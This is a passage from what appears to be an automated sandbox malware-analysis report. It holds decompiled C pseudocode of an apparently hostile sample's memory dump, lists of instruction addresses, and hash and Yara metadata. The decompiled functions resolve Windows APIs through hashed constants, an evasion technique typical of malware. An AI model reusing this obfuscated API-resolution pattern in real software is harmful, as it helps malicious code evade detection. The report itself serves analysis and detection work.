						} while (_t386 != 0);
						_t531 = _a4;
						E003C37E0( &_v56, _t509, _v56);
						 *_t531 = 0;
						_t531[1] = 0;
						_t531[2] = 0;
						E003C3B00(_t531,  &_v56);
						_t512 = _v68;
						_v68 = 0;
						_v60 = 0;
						_t496 = _v64;
						if(_t512 > 0) {
							_t321 = _t512 >> 1;
							if(_t321 == 0) {
								_t322 = 1;
							} else {
								_t392 = 0;
								_t533 = _t321;
								do {
									_t440 =  *((intOrPtr*)(_t496 + _t392 * 8));
									if( *((intOrPtr*)(_t496 + _t392 * 8)) != 0) {
										_push(1);
										E003B87B0(_t440);
										_t496 = _v56;
									}
									_t441 =  *((intOrPtr*)(_t496 + 4 + _t392 * 8));
									if( *((intOrPtr*)(_t496 + 4 + _t392 * 8)) != 0) {
										_push(1);
										E003B87B0(_t441);
										_t496 = _v56;
									}
									_t392 = _t392 + 1;
								} while (_t392 < _t533);
								_t531 = _a4;
								_t196 = _t392 + 1; // 0x2
								_t322 = _t392 + _t196;
							}
							_t197 = _t322 - 1; // 0x1
							if(_t197 < _t512) {
								_t439 =  *((intOrPtr*)(_t496 + _t322 * 4 - 4));
								if( *((intOrPtr*)(_t496 + _t322 * 4 - 4)) != 0) {
									_push(1);
									E003B87B0(_t439);
									_t496 = _v56;
								}
							}
						}
						_push(4);
						_push(_t496);
						E003B10B0();
						_v52 = 0;
						return _t531;
					}
				}
			}

0x003c50a9
0x003c50ac
0x003c50ae
0x003c50b1
0x003c50b6
0x003c50c1
0x003c50c3
0x003c50c9
0x003c50ce
0x003c50d0
0x003c50d3
0x003c50da
0x003c50df
0x003c50e1
0x003c50e6
0x003c52bd
0x003c50ec
0x003c50ec
0x003c50f0
0x003c50f2
0x003c50f7
0x003c5265
0x003c526c
0x003c526e
0x003c5271
0x003c5275
0x003c52af
0x003c5277
0x003c5279
0x003c527b
0x003c527e
0x003c5282
0x003c5284
0x003c5286
0x003c5286
0x003c5287
0x003c528c
0x003c5292
0x00000000
0x00000000
0x003c5294
0x003c5298
0x003c529d
0x00000000
0x00000000
0x00000000
0x003c529d
0x003c529f
0x003c529f
0x003c5282
0x003c52a2
0x003c52a4
0x003c52a5
0x003c52aa
0x003c52aa
0x003c52b2
0x003c52b4
0x003c5106
0x003c5108
0x003c510b
0x003c511f
0x003c5123
0x003c512f
0x003c5135
0x003c5135
0x003c513a
0x003c513e
0x003c5144
0x00000000
0x00000000
0x003c514a
0x003c514f
0x00000000
0x003c5151
0x003c5157
0x003c5168
0x003c5168
0x00000000
0x003c5159
0x003c515f
0x003c5166
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c5166
0x003c5159
0x003c5157
0x00000000
0x003c514f
0x003c5800
0x003c5803
0x003c510d
0x003c510f
0x003c5111
0x003c5114
0x003c511a
0x003c511d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c511d
0x003c5114
0x003c516d
0x003c5172
0x003c5178
0x003c517d
0x003c5190
0x003c5193
0x003c5197
0x003c519d
0x003c51a5
0x003c51a5
0x003c51b2
0x003c51b5
0x003c51b9
0x003c51ba
0x003c51be
0x003c51c3
0x003c51c7
0x003c51ca
0x003c51cc
0x003c51d2
0x003c5231
0x003c51d4
0x003c51d6
0x003c51d8
0x003c51db
0x003c51df
0x003c51e1
0x003c51e4
0x003c51e6
0x003c51ea
0x003c51ee
0x003c51ee
0x003c51ef
0x003c51f4
0x003c51fa
0x00000000
0x00000000
0x003c51fc
0x003c5200
0x003c5205
0x00000000
0x00000000
0x00000000
0x003c5205
0x003c5207
0x003c520a
0x003c520e
0x003c520e
0x003c51df
0x003c5211
0x003c5213
0x003c5217
0x003c521b
0x003c521f
0x003c5224
0x003c5228
0x003c522c
0x003c522c
0x003c5238
0x003c523b
0x003c517f
0x003c517f
0x003c517f
0x003c523f
0x003c5243
0x003c5249
0x003c5249
0x003c524c
0x003c524d
0x003c5251
0x00000000
0x00000000
0x003c525d
0x003c57f8
0x003c5263
0x003c5247
0x003c5248
0x00000000
0x003c5248
0x00000000
0x003c525d
0x003c57ec
0x003c57ef
0x003c57ef
0x003c523f
0x003c50f7
0x003c52bf
0x003c52c4
0x003c52cf
0x003c52d2
0x003c52d2
0x003c52d6
0x003c52db
0x003c52e0
0x003c5865
0x003c5867
0x003c586d
0x003c5872
0x003c5874
0x003c5877
0x003c587e
0x003c5883
0x003c5885
0x003c588a
0x003c5a59
0x003c5890
0x003c5890
0x003c5894
0x003c5896
0x003c589b
0x003c5a01
0x003c5a08
0x003c5a0a
0x003c5a0d
0x003c5a11
0x003c5a4b
0x003c5a13
0x003c5a15
0x003c5a17
0x003c5a1a
0x003c5a1e
0x003c5a20
0x003c5a22
0x003c5a22
0x003c5a23
0x003c5a28
0x003c5a2e
0x00000000
0x00000000
0x003c5a30
0x003c5a34
0x003c5a39
0x00000000
0x00000000
0x00000000
0x003c5a39
0x003c5a3b
0x003c5a3b
0x003c5a1e
0x003c5a3e
0x003c5a40
0x003c5a41
0x003c5a46
0x003c5a46
0x003c5a4e
0x003c5a50
0x003c58aa
0x003c58ac
0x003c58af
0x003c58c3
0x003c58c7
0x003c58d3
0x003c58d9
0x003c58d9
0x003c58de
0x003c58e2
0x003c58e8
0x00000000
0x00000000
0x003c58ee
0x003c58f3
0x00000000
0x003c58f5
0x003c58fb
0x003c590c
0x003c590c
0x00000000
0x003c58fd
0x003c5903
0x003c590a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c590a
0x003c58fd
0x003c58fb
0x00000000
0x003c58f3
0x003c5a7c
0x003c5a7f
0x003c58b1
0x003c58b3
0x003c58b5
0x003c58b8
0x003c58be
0x003c58c1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c58c1
0x003c58b8
0x003c5911
0x003c5916
0x003c591c
0x003c5921
0x003c5934
0x003c5937
0x003c593b
0x003c5941
0x003c5949
0x003c5949
0x003c5956
0x003c5959
0x003c595d
0x003c595e
0x003c5962
0x003c5967
0x003c596b
0x003c596e
0x003c5970
0x003c5976
0x003c59d5
0x003c5978
0x003c597a
0x003c597c
0x003c597f
0x003c5983
0x003c5985
0x003c5988
0x003c598a
0x003c598e
0x003c5992
0x003c5992
0x003c5993
0x003c5998
0x003c599e
0x00000000
0x00000000
0x003c59a0
0x003c59a4
0x003c59a9
0x00000000
0x00000000
0x00000000
0x003c59a9
0x003c59ab
0x003c59ae
0x003c59b2
0x003c59b2
0x003c5983
0x003c59b5
0x003c59b7
0x003c59bb
0x003c59bf
0x003c59c3
0x003c59c8
0x003c59cc
0x003c59d0
0x003c59d0
0x003c59dc
0x003c59df
0x003c5923
0x003c5923
0x003c5923
0x003c59e3
0x003c59e7
0x003c59ed
0x003c59ed
0x003c59f0
0x003c59f1
0x003c59f5
0x00000000
0x00000000
0x003c59fd
0x003c5a77
0x003c59ff
0x003c59eb
0x003c59ec
0x00000000
0x003c59ec
0x00000000
0x003c59fd
0x003c5a6e
0x003c5a71
0x003c5a71
0x003c59e3
0x003c589b
0x003c5a5b
0x003c5a60
0x003c5a6b
0x003c52e6
0x003c52e8
0x003c52ea
0x003c52ee
0x003c52f2
0x003c52f6
0x003c52f9
0x003c530f
0x003c5313
0x003c531f
0x003c5325
0x003c5325
0x003c532a
0x003c532e
0x003c5334
0x00000000
0x00000000
0x003c533a
0x003c533f
0x00000000
0x003c5341
0x003c534a
0x003c535b
0x003c535b
0x00000000
0x003c534c
0x003c5352
0x003c5359
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c5359
0x003c534c
0x003c534a
0x00000000
0x003c533f
0x003c584f
0x003c5855
0x003c52fb
0x003c52fd
0x003c5300
0x003c530a
0x003c530d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c530d
0x003c585c
0x003c585c
0x003c5360
0x003c5360
0x003c5364
0x003c5366
0x003c5366
0x003c5368
0x003c53dd
0x003c53e4
0x003c53e6
0x003c53e9
0x003c5373
0x003c5378
0x003c537e
0x003c5383
0x003c5393
0x003c5396
0x003c539c
0x003c53a4
0x003c53a4
0x003c53b1
0x003c53b7
0x003c53b9
0x003c53bc
0x003c53c1
0x003c53c3
0x003c53c5
0x003c53c5
0x003c53c6
0x003c53cb
0x003c53d1
0x00000000
0x00000000
0x003c53d9
0x00000000
0x00000000
0x003c53db
0x00000000
0x003c53d9
0x003c580a
0x003c580a
0x003c5385
0x003c5385
0x003c5385
0x003c5383
0x003c53ec
0x003c53ec
0x003c53f4
0x003c53f9
0x003c53fc
0x003c5400
0x003c5406
0x003c540b
0x003c5416
0x003c541c
0x003c5430
0x003c5435
0x003c5437
0x003c543b
0x003c5440
0x003c5447
0x003c544b
0x003c544b
0x003c544f
0x003c5453
0x003c5469
0x003c546e
0x003c546e
0x003c5471
0x003c5478
0x003c547a
0x003c547f
0x003c5701
0x003c5485
0x003c5487
0x003c5489
0x003c548e
0x003c5668
0x003c566a
0x003c566e
0x003c5673
0x003c5677
0x003c567b
0x003c567e
0x003c5680
0x003c5686
0x003c56ef
0x003c5688
0x003c568d
0x003c568f
0x003c5693
0x003c5696
0x003c569a
0x003c569c
0x003c569f
0x003c56a1
0x003c56a5
0x003c56a9
0x003c56ad
0x003c56af
0x003c56af
0x003c56b0
0x003c56b5
0x003c56bb
0x00000000
0x00000000
0x003c56bd
0x003c56c1
0x003c56c6
0x00000000
0x00000000
0x00000000
0x003c56c6
0x003c56c8
0x003c56cb
0x003c56cf
0x003c56cf
0x003c569a
0x003c56d3
0x003c56d5
0x003c56d9
0x003c56dd
0x003c56e2
0x003c56e6
0x003c56e6
0x003c56f6
0x003c56f8
0x003c549d
0x003c549f
0x003c54a2
0x003c54c4
0x003c54c8
0x003c54d4
0x003c54d9
0x003c54dd
0x003c54e1
0x003c54e3
0x003c54e3
0x003c54e8
0x003c54ec
0x003c54f2
0x00000000
0x00000000
0x003c54f8
0x003c54fd
0x00000000
0x003c54ff
0x003c54ff
0x003c5503
0x003c550f
0x003c5527
0x003c5527
0x003c5511
0x003c5511
0x003c5515
0x003c551f
0x003c5525
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c5525
0x00000000
0x003c5515
0x003c550f
0x00000000
0x003c54fd
0x003c5831
0x003c5836
0x003c583a
0x003c54a4
0x003c54a4
0x003c54ae
0x003c54b2
0x003c54b5
0x003c54bf
0x003c54c2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c54c2
0x003c5828
0x003c5828
0x003c5828
0x003c552f
0x003c553e
0x003c5543
0x003c555c
0x003c555f
0x003c5563
0x003c5568
0x003c5570
0x003c5570
0x003c557d
0x003c5580
0x003c5584
0x003c5585
0x003c5589
0x003c558e
0x003c5592
0x003c5596
0x003c5599
0x003c559b
0x003c55a1
0x003c560c
0x003c55a3
0x003c55a8
0x003c55ac
0x003c55af
0x003c55b3
0x003c55b7
0x003c55b9
0x003c55bc
0x003c55be
0x003c55c2
0x003c55c6
0x003c55ca
0x003c55cc
0x003c55cc
0x003c55cd
0x003c55d2
0x003c55d8
0x00000000
0x00000000
0x003c55da
0x003c55de
0x003c55e3
0x00000000
0x00000000
0x00000000
0x003c55e3
0x003c55e5
0x003c55e8
0x003c55ec
0x003c55ec
0x003c55b7
0x003c55f0
0x003c55f2
0x003c55f6
0x003c55fa
0x003c55ff
0x003c5603
0x003c5603
0x003c5617
0x003c561a
0x003c5545
0x003c5545
0x003c5545
0x003c5621
0x003c562f
0x003c5633
0x003c5635
0x003c5639
0x003c563d
0x003c5641
0x003c5641
0x003c5642
0x003c5647
0x003c564d
0x00000000
0x00000000
0x003c5659
0x00000000
0x003c565b
0x003c565b
0x003c565f
0x003c565f
0x00000000
0x003c5659
0x003c5817
0x003c581b
0x003c581f
0x003c581f
0x003c5621
0x003c548e
0x003c5703
0x003c570b
0x003c570e
0x003c5712
0x003c5714
0x003c5715
0x003c571a
0x003c5721
0x003c572d
0x003c572f
0x003c5737
0x003c5745
0x003c574f
0x003c5751
0x003c5754
0x003c5757
0x003c575c
0x003c5762
0x003c5766
0x003c576a
0x003c5770
0x003c5774
0x003c5776
0x003c5843
0x003c577c
0x003c577c
0x003c577e
0x003c5780
0x003c5780
0x003c5785
0x003c5787
0x003c5789
0x003c578e
0x003c578e
0x003c5792
0x003c5798
0x003c579a
0x003c579c
0x003c57a1
0x003c57a1
0x003c57a5
0x003c57a6
0x003c57aa
0x003c57ad
0x003c57ad
0x003c57ad
0x003c57b1
0x003c57b6
0x003c57b8
0x003c57be
0x003c57c0
0x003c57c2
0x003c57c7
0x003c57c7
0x003c57be
0x003c57b6
0x003c57cb
0x003c57cd
0x003c57ce
0x003c57d6
0x003c57e9
0x003c57e9
0x003c52e0

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8132493ed869d81ea9f5ab984da2c4f4fcac5c189bdde6216712a0318459efd1
Instruction ID: 328e317d5c043ed54eaf3386db5421b19df46beba97c0c4927249e7c542c699a
Opcode Fuzzy Hash: 8132493ed869d81ea9f5ab984da2c4f4fcac5c189bdde6216712a0318459efd1
Instruction Fuzzy Hash: A4621774608B428BD716CF28C480B1ABBE2BFC5314F19866DE995CB351EB75ED81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003B5B60, Relevance: .8, Instructions: 810
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E003B5B60(void* __ebx, signed int __ecx, void* __edi, signed int __esi, void* __eflags) {
				intOrPtr* _t250;
				signed int _t255;
				signed int _t265;
				signed int _t268;
				signed int _t275;
				signed int _t278;
				signed int _t281;
				signed int _t285;
				signed int _t290;
				signed int _t292;
				signed int _t293;
				void* _t294;
				void* _t297;
				signed int _t302;
				signed int _t305;
				signed int _t313;
				signed int _t320;
				signed int _t325;
				signed int _t330;
				signed int _t333;
				signed int _t338;
				signed int _t363;
				signed int _t371;
				signed int _t380;
				signed int _t383;
				signed int _t388;
				signed int _t398;
				void* _t401;
				signed int _t404;
				signed int _t405;
				signed int _t407;
				signed int _t408;
				void* _t409;
				void* _t410;
				void* _t452;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t535;
				signed int _t550;
				signed int _t551;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t560;
				void* _t561;
				signed int _t562;
				void* _t565;
				signed short* _t566;
				signed int _t567;
				signed int _t569;
				signed int _t571;
				void* _t572;
				signed int* _t573;
				signed int* _t575;

				_t558 = __esi;
				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_push(_t565);
				_t573 = _t572 - 0xfc;
				_t550 = __ecx;
				E003D2970(__ebx, __ecx, __ecx);
				_push(0);
				E003C9350( &(_t573[6]));
				_push(0);
				E003C9350( &(_t573[0xb]));
				E003C9670( &(_t573[7]), E003C9650( &(_t573[6])) + 4);
				 *((intOrPtr*)(E003C9640( &(_t573[7]), E003C9650( &(_t573[6])) + 0xfffffffc))) = 0x4f6a34b4;
				E003C9670( &(_t573[7]), E003C9650( &(_t573[6])) + 4);
				 *((intOrPtr*)(E003C9640( &(_t573[7]), E003C9650( &(_t573[6])) + 0xfffffffc))) = 0x52375f3;
				E003C9670( &(_t573[7]), E003C9650( &(_t573[6])) + 4);
				 *((intOrPtr*)(E003C9640( &(_t573[7]), E003C9650( &(_t573[6])) + 0xfffffffc))) = 0xda7c7ca2;
				E003C9670( &(_t573[7]), E003C9650( &(_t573[6])) + 4);
				 *((intOrPtr*)(E003C9640( &(_t573[7]), E003C9650( &(_t573[6])) + 0xfffffffc))) = 0x795cb255;
				E003C9670( &(_t573[7]), E003C9650( &(_t573[6])) + 4);
				_t250 = E003C9640( &(_t573[7]), E003C9650( &(_t573[6])) + 0xfffffffc);
				_push(0);
				 *_t250 = 0x9fbb14a6;
				E003CC550(__ebx,  &(_t573[0x17]), __esi, _t565,  &(_t573[8]), 0x80000002);
				_t521 =  *0x3db1f4; // 0x2661568
				if(_t521 == 0xc139578) {
					 *0x3db1f4 = 0;
					goto L6;
				} else {
					if(_t521 == 0) {
						L6:
						_push(0xa1310f65);
						_t403 = E003B7564(0xa1310f65);
						if(_t403 == 0) {
							_t255 = E003B6C50(0xa1310f65);
							__eflags = _t255;
							if(_t255 != 0) {
								_push(0xa1310f65);
								_t403 = E003B7564(0xa1310f65);
							}
						}
						if(_t403 == 0) {
							goto L11;
						} else {
							_t573 =  &(_t573[0xfffffffffffffffe]);
							_t398 = E003B67C8(_t403, 0xf95c938e);
							goto L9;
						}
					} else {
						do {
							_t403 = 0;
							_t401 = 0;
							while( *((intOrPtr*)(_t401 + _t521 + 8)) != 0xf95c938e) {
								_t403 =  &(_t403[0]);
								_t401 = _t401 + 0x18;
								if(_t403 < 0x10) {
									continue;
								} else {
									goto L5;
								}
								goto L162;
							}
							_t398 =  *(_t401 + _t521 + 0x14);
							__eflags = _t398;
							if(_t398 != 0) {
								L9:
								if(_t398 == 0) {
									L11:
									_t566 = 0;
									__eflags = 0;
									_t573[3] = _t550;
									while(1) {
										__eflags =  *_t566 & 0x0000ffff;
										if(( *_t566 & 0x0000ffff) == 0) {
											break;
										}
										E003B8AB0( &(_t573[0x38]), _t566, 0);
										_t383 = E003C0180(_t573[0x36], 0x7fffffff, _t558);
										_t403 =  &(_t573[0x38]);
										_t566 = _t566 + 2 + _t383 * 2;
										E003BA660( &(_t573[0x38]), __eflags,  &(_t573[0x38]), 0x3d);
										E003BA0D0( &(_t573[0x38]),  &(_t573[0x3a]));
										E003B83B0( &(_t573[0x3c]));
										_t388 = E003CD620(_t573[0x3c], E003C6040(_t573[0x3c], 0x7fffffff));
										E003C0B10( &(_t573[0x3c]));
										E003B8CA0( &(_t573[0x3a]));
										_t558 = _t388 ^ 0x38ba5c7b;
										__eflags = (_t388 ^ 0x38ba5c7b) - 0x258c0aca;
										if(__eflags == 0) {
											_t551 = _t573[3];
											E003BB6F0( &(_t573[0x38]), __eflags,  &(_t573[0x29]), 0x3d);
											E003B8CA0(_t403);
											E003B8CA0( &(_t573[0x36]));
										} else {
											E003B8CA0(_t403);
											E003B8CA0( &(_t573[0x36]));
											continue;
										}
										L17:
										E003B96D0( &(_t573[0x29]), 0x5c);
										E003CCE00(_t403,  &(_t573[0x15]), _t551, _t558, _t566,  &(_t573[0x2a]));
										__eflags = _t573[0x2a];
										if(_t573[0x2a] <= 0) {
											L66:
											_push(0x4c0);
											E003C9350( &(_t573[3]));
											_t567 = E003C9640( &(_t573[3]), 0);
											_t522 =  *0x3db1f4; // 0x2661568
											_t573[0x35] = 0;
											__eflags = _t522 - 0xc139578;
											if(_t522 == 0xc139578) {
												 *0x3db1f4 = 0;
												goto L72;
											} else {
												__eflags = _t522;
												if(_t522 == 0) {
													L72:
													_push(0x3ab7f42e);
													_t404 = E003B7564(0x3ab7f42e);
													__eflags = _t404;
													if(_t404 == 0) {
														_t265 = E003B6C50(0x3ab7f42e);
														__eflags = _t265;
														if(_t265 != 0) {
															_push(0x3ab7f42e);
															_t404 = E003B7564(0x3ab7f42e);
														}
													}
													__eflags = _t404;
													if(_t404 != 0) {
														_t573 =  &(_t573[0xfffffffffffffffe]);
														_t407 = E003B67C8(_t404, 0x87cdd143);
														goto L75;
													}
												} else {
													do {
														_t410 = 0;
														_t305 = 0;
														__eflags = 0;
														while(1) {
															__eflags =  *((intOrPtr*)(_t305 + _t522 + 8)) - 0x87cdd143;
															if( *((intOrPtr*)(_t305 + _t522 + 8)) == 0x87cdd143) {
																break;
															}
															_t410 = _t410 + 1;
															_t305 = _t305 + 0x18;
															__eflags = _t410 - 0x10;
															if(_t410 < 0x10) {
																continue;
															} else {
																goto L71;
															}
															goto L99;
														}
														_t407 =  *(_t305 + _t522 + 0x14);
														__eflags = _t407;
														if(_t407 != 0) {
															L75:
															__eflags = _t407;
															if(_t407 != 0) {
																_t285 =  *_t407(0,  &(_t573[0x2d]),  &(_t573[0x35]));
																__eflags = _t285;
																if(_t285 != 0) {
																	__eflags = _t573[0x35];
																	if(_t573[0x35] > 0) {
																		_t152 = _t567 + 0x488; // 0x488
																		_t573[0x3e] = _t152;
																		_t154 = _t567 + 0x464; // 0x464
																		_t573[0x2e] = _t154;
																		_t408 = 0;
																		__eflags = 0;
																		_t573[0x30] = _t567;
																		_t569 = 0;
																		do {
																			E003B0B70(_t573[6], 0, _t573[3]);
																			_t573 =  &(_t573[3]);
																			_t560 =  *0x3db1f4; // 0x2661568
																			__eflags = _t560 - 0xc139578;
																			if(_t560 == 0xc139578) {
																				 *0x3db1f4 = 0;
																				goto L86;
																			} else {
																				__eflags = _t560;
																				if(_t560 == 0) {
																					L86:
																					_push(0x3ab7f42e);
																					_t529 = E003B7564(0x3ab7f42e);
																					__eflags = _t529;
																					if(_t529 == 0) {
																						 *_t573 = _t529;
																						_t290 = E003B6C50(0x3ab7f42e);
																						_t529 =  *_t573;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_push(0x3ab7f42e);
																							_t529 = E003B7564(0x3ab7f42e);
																						}
																					}
																					__eflags = _t529;
																					if(_t529 != 0) {
																						_t573 =  &(_t573[0xfffffffffffffffe]);
																						_t562 = E003B67C8(_t529, 0xcf247eca);
																						goto L89;
																					}
																				} else {
																					__eflags = 0;
																					do {
																						_t302 = 0;
																						_t531 = 0;
																						while(1) {
																							__eflags =  *((intOrPtr*)(_t531 + _t560 + 8)) - 0xcf247eca;
																							if( *((intOrPtr*)(_t531 + _t560 + 8)) == 0xcf247eca) {
																								break;
																							}
																							_t302 = _t302 + 1;
																							_t531 = _t531 + 0x18;
																							__eflags = _t302 - 0x10;
																							if(_t302 < 0x10) {
																								continue;
																							} else {
																								goto L85;
																							}
																							goto L91;
																						}
																						_t562 =  *(_t531 + _t560 + 0x14);
																						__eflags = _t562;
																						if(_t562 != 0) {
																							L89:
																							__eflags = _t562;
																							if(_t562 != 0) {
																								_t297 = E003C9650( &(_t573[2]));
																								 *_t562(0,  *((intOrPtr*)(_t573[0x2d] + _t408)), 8, _t573[0x32], _t297,  &(_t573[1]));
																							}
																							goto L91;
																						} else {
																							goto L86;
																						}
																						goto L99;
																						L85:
																						asm("o16 nop [eax+eax]");
																						_t161 = _t560 + 0x180; // 0x26890a8
																						_t560 =  *_t161;
																						__eflags = _t560;
																					} while (_t560 != 0);
																					goto L86;
																				}
																			}
																			L91:
																			_t530 = _t573[0x30];
																			_t558 =  *(_t530 + 0x488) & 0x0000ffff;
																			__eflags =  *(_t530 + 0x488) & 0x0000ffff;
																			if(( *(_t530 + 0x488) & 0x0000ffff) != 0) {
																				__eflags =  *(_t551 + 4);
																				if( *(_t551 + 4) > 0) {
																					_t561 = 0;
																					_t573[0x1f] = _t408;
																					_t573[0x1e] = _t569;
																					__eflags = 0;
																					do {
																						_t409 = E003D2B00(_t551, _t561);
																						_push(0);
																						_push(0);
																						_t292 = E003C00B0(_t409,  *((intOrPtr*)(_t409 + 0x14)), _t573[0x40], _t551);
																						__eflags = _t292;
																						if(_t292 != 0) {
																							goto L96;
																						} else {
																							_push(0);
																							_push(0);
																							_t293 = E003C00B0(_t409,  *((intOrPtr*)(_t409 + 0x1c)), _t573[0x30], _t551);
																							__eflags = _t293;
																							if(_t293 == 0) {
																								_t294 = _t409;
																								 *((char*)(_t294 + 0x3c)) = 1;
																								_t535 = _t573[0x2d];
																								_t408 = _t573[0x1f];
																								_t569 = _t573[0x1e];
																								_t558 =  *(_t535 + _t408);
																								 *(_t294 + 0x40) =  *(_t535 + _t408);
																							} else {
																								goto L96;
																							}
																						}
																						goto L98;
																						L96:
																						_t561 = _t561 + 1;
																						__eflags = _t561 -  *(_t551 + 4);
																					} while (_t561 <  *(_t551 + 4));
																					_t408 = _t573[0x1f];
																					_t569 = _t573[0x1e];
																				}
																			}
																			L98:
																			_t569 = _t569 + 1;
																			_t408 = _t408 + 0x4c;
																			__eflags = _t569 - _t573[0x35];
																		} while (_t569 < _t573[0x35]);
																	}
																}
															}
														} else {
															goto L72;
														}
														goto L99;
														L71:
														asm("o16 nop [eax+eax]");
														_t148 = _t522 + 0x180; // 0x26890a8
														_t522 =  *_t148;
														__eflags = _t522;
													} while (_t522 != 0);
													goto L72;
												}
											}
											L99:
											_t523 =  *0x3db1f4; // 0x2661568
											__eflags = _t523 - 0xc139578;
											if(_t523 == 0xc139578) {
												 *0x3db1f4 = 0;
												goto L105;
											} else {
												__eflags = _t523;
												if(_t523 == 0) {
													L105:
													_push(0x3ab7f42e);
													_t405 = E003B7564(0x3ab7f42e);
													__eflags = _t405;
													if(_t405 == 0) {
														_t268 = E003B6C50(0x3ab7f42e);
														__eflags = _t268;
														if(_t268 != 0) {
															_push(0x3ab7f42e);
															_t405 = E003B7564(0x3ab7f42e);
														}
													}
													__eflags = _t405;
													if(_t405 == 0) {
														goto L110;
													} else {
														_t573 =  &(_t573[0xfffffffffffffffe]);
														_t278 = E003B67C8(_t405, 0xd39512d0);
														goto L108;
													}
												} else {
													do {
														_t452 = 0;
														_t281 = 0;
														__eflags = 0;
														while(1) {
															__eflags =  *((intOrPtr*)(_t281 + _t523 + 8)) - 0xd39512d0;
															if( *((intOrPtr*)(_t281 + _t523 + 8)) == 0xd39512d0) {
																break;
															}
															_t452 = _t452 + 1;
															_t281 = _t281 + 0x18;
															__eflags = _t452 - 0x10;
															if(_t452 < 0x10) {
																continue;
															} else {
																goto L104;
															}
															goto L162;
														}
														_t278 =  *(_t281 + _t523 + 0x14);
														__eflags = _t278;
														if(_t278 != 0) {
															L108:
															__eflags = _t278;
															if(_t278 == 0) {
																L110:
																E003C9510( &(_t573[2]));
																E003C7560( &(_t573[0x2a]), _t551, _t558);
																E003B8CA0( &(_t573[0x28]));
																E003B8CA0( &(_t573[0x17]));
																__eflags = _t573[0x16];
																if(_t573[0x16] != 0) {
																	_t524 = _t573[0x15];
																	__eflags = _t524;
																	if(_t524 == 0) {
																		L114:
																		_t275 = 1;
																	} else {
																		__eflags = _t524 - 0xffffffff;
																		if(_t524 == 0xffffffff) {
																			goto L114;
																		} else {
																			_t275 = 0;
																		}
																	}
																	__eflags = _t275;
																	if(_t275 == 0) {
																		E003CBF00(_t524);
																	}
																}
																_t573[0x15] = 0;
																E003C9510( &(_t573[0xa]));
																return E003C9510( &(_t573[6]));
															} else {
																_push(_t573[0x2d]);
																asm("int3");
																return _t278;
															}
														} else {
															goto L105;
														}
														goto L162;
														L104:
														asm("o16 nop [eax+eax]");
														_t182 = _t523 + 0x180; // 0x26890a8
														_t523 =  *_t182;
														__eflags = _t523;
													} while (_t523 != 0);
													goto L105;
												}
											}
										} else {
											_t571 = 0;
											__eflags = 0;
											_t573[3] = _t551;
											_t537 =  &(_t573[0x24]);
											do {
												_t411 = E003C7600( &(_t573[0x2b]), _t571);
												_push(0);
												_push(_t573[0x16]);
												E003CC070( &(_t573[0x1c]), __eflags,  *_t306);
												E003CC580( &(_t573[0x1b]), _t537,  &(_t573[0x34]), 0x6fac26cf);
												_push(_t573[0x33]);
												E003CC6D0( &(_t573[0x1b]),  &(_t573[0x25]));
												E003C0B10( &(_t573[0x33]));
												_t313 = E003C9660( &(_t573[0x24]));
												__eflags = _t313;
												if(_t313 == 0) {
													_t573[2] = E003C9640( &(_t573[0x25]), 0);
													_t573[0x31] = 0x40;
													_t573[0x32] = 0x40;
													E003B8810( &(_t573[0x21]), 0x40);
													E003B8810( &(_t573[0x23]), _t573[0x32]);
													_t558 =  *0x3db1f4; // 0x2661568
													__eflags = _t558 - 0xc139578;
													if(_t558 == 0xc139578) {
														 *0x3db1f4 = 0;
														goto L34;
													} else {
														__eflags = _t558;
														if(_t558 == 0) {
															L34:
															_push(0x3ab94787);
															_t573[1] = E003B7564(0x3ab94787);
															__eflags = _t573[1];
															if(_t573[1] == 0) {
																_t320 = E003B6C50(0x3ab94787);
																__eflags = _t320;
																if(_t320 != 0) {
																	_push(0x3ab94787);
																	_t573[1] = E003B7564(0x3ab94787);
																}
															}
															__eflags = _t573[1];
															if(_t573[1] == 0) {
																goto L57;
															} else {
																_t573 =  &(_t573[0xfffffffffffffffe]);
																_t537 = 0x738dad93;
																_t553 = E003B67C8(_t573[3], 0x738dad93);
																goto L37;
															}
														} else {
															__eflags = 0;
															do {
																_t554 = 0;
																_t537 = 0;
																while(1) {
																	__eflags =  *((intOrPtr*)(_t537 + _t558 + 8)) - 0x738dad93;
																	if( *((intOrPtr*)(_t537 + _t558 + 8)) == 0x738dad93) {
																		break;
																	}
																	_t554 = _t554 + 1;
																	_t537 = _t537 + 0x18;
																	__eflags = _t554 - 0x10;
																	if(_t554 < 0x10) {
																		continue;
																	} else {
																		goto L33;
																	}
																	goto L162;
																}
																_t553 =  *(_t537 + _t558 + 0x14);
																__eflags = _t553;
																if(_t553 != 0) {
																	L37:
																	__eflags = _t553;
																	if(_t553 == 0) {
																		L57:
																		E003B8CA0( &(_t573[0x22]));
																		E003B8CA0( &(_t573[0x20]));
																		E003C9510( &(_t573[0x24]));
																		E003B8CA0( &(_t573[0x1c]));
																		__eflags = _t573[0x1b];
																		if(_t573[0x1b] != 0) {
																			_t537 = _t573[0x1a];
																			__eflags = _t537;
																			if(_t537 == 0) {
																				L61:
																				_t325 = 1;
																			} else {
																				__eflags = _t537 - 0xffffffff;
																				if(_t537 == 0xffffffff) {
																					goto L61;
																				} else {
																					_t325 = 0;
																				}
																			}
																			__eflags = _t325;
																			if(_t325 == 0) {
																				E003CBF00(_t537);
																			}
																		}
																		goto L64;
																	} else {
																		_t537 =  &(_t573[0x32]);
																		_t558 =  &(_t573[0x31]);
